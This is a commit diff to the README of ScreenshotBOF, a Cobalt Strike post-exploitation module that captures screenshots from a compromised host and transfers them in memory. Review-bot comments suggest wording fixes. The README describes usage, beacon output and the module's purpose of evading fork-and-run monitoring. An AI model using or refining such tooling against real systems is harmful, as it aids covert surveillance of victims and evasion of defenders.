readme
This commit is contained in:
parent
1383db6e7e
commit
7e0ee92cc4
22
README.md
@ -1,6 +1,6 @@
|
||||||
# ScreenshotBOF
|
# ScreenshotBOF
|
||||||
|
|
||||||
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
|
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.
|
||||||
|
|
||||||
## Self Compilation
|
## Self Compilation
|
||||||
1. git clone the repo
|
1. git clone the repo
|
||||||
|
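Review bot: the new one-line description, "Screenshot downloaded in memory.", is a fragment and leaves the key operational question open: whether any bitmap is still written to the target's disk before transfer. The old text said the screenshot was "saved to disk as a file"; the new text only says how it is downloaded. Suggest a full sentence that states both halves explicitly, e.g. "The screenshot is transferred to the team server in memory; no file is written on the target." (or the opposite, if a temporary file remains), so readers and anyone reviewing the tool's footprint do not have to infer it.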
@ -9,29 +9,20 @@ An alternative screenshot capability for Cobalt Strike that uses WinAPI and does
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
1. import the screenshotBOF.cna script into Cobalt Strike
|
1. import the screenshotBOF.cna script into Cobalt Strike
|
||||||
2. use the command screenshot_bof
|
2. use the command screenshot_bof {local filename}
|
||||||
3. Download the screenshot from the target
|
|
||||||
```
|
```
|
||||||
beacon> screenshot_bof
|
beacon> screenshot_bof sad.bmp
|
||||||
[*] Running screenshot BOF by (@codex_tf2)
|
[*] Running screenshot BOF by (@codex_tf2)
|
||||||
[+] host called home, sent: 3411 bytes
|
[+] host called home, sent: 4860 bytes
|
||||||
[+] received output:
|
[+] received output:
|
||||||
[*] Tasked beacon to printscreen and save to disk
|
[*] Tasked beacon to printscreen and save to sad.bmp
|
||||||
[+] received output:
|
[+] received output:
|
||||||
[+] PrintScreen saved to bitmap...
|
[+] PrintScreen saved to bitmap...
|
||||||
[+] received output:
|
[*] started download of sad.bmp
|
||||||
[+] Printscreen bitmap saved to screenshot.bmp
|
|
||||||
beacon> download screenshot.bmp
|
|
||||||
[*] Tasked beacon to download screenshot.bmp
|
|
||||||
[+] host called home, sent: 22 bytes
|
|
||||||
[*] started download of C:\screenshot.bmp (12441668 bytes)
|
|
||||||
[*] download of screenshot.bmp is complete
|
|
||||||
```
|
```
|
||||||
|
|
||||||
## Notes
|
## Notes
|
||||||
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
|
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
|
||||||
- in memory downloading of screenshots is planned to be added
|
|
||||||
- the filename can be changed in the source code.
|
|
||||||
|
|
||||||
## Why did I make this?
|
## Why did I make this?
|
||||||
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
|
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
|
||||||
|
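Review bot: the sample output line "[*] Tasked beacon to printscreen and save to sad.bmp" still reads as if the file is saved on the target, which contradicts the updated description ("downloaded in memory") and the removal of step 3 ("Download the screenshot from the target"). Since `sad.bmp` is the `{local filename}` argument introduced in step 2, suggest wording such as "[*] Tasked beacon to printscreen; saving as sad.bmp on the team server" so the log matches the new behaviour. Separately, the removed note "the filename can be changed in the source code" was the only place the output name was documented; step 2 now introduces `{local filename}` but does not say whether the argument is required, what the default is when it is omitted, or where on the operator's machine the file lands. Add a sentence under Usage covering those three points.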
@ -39,3 +30,4 @@ Cobalt Strike uses a technique known as fork & run for many of its post-ex capab
|
||||||
## Credits
|
## Credits
|
||||||
- Made using https://github.com/securifybv/Visual-Studio-BOF-template
|
- Made using https://github.com/securifybv/Visual-Studio-BOF-template
|
||||||
- Save BMP to file from https://stackoverflow.com/a/60667564
|
- Save BMP to file from https://stackoverflow.com/a/60667564
|
||||||
|
- in memory download from https://github.com/anthemtotheego/CredBandit
|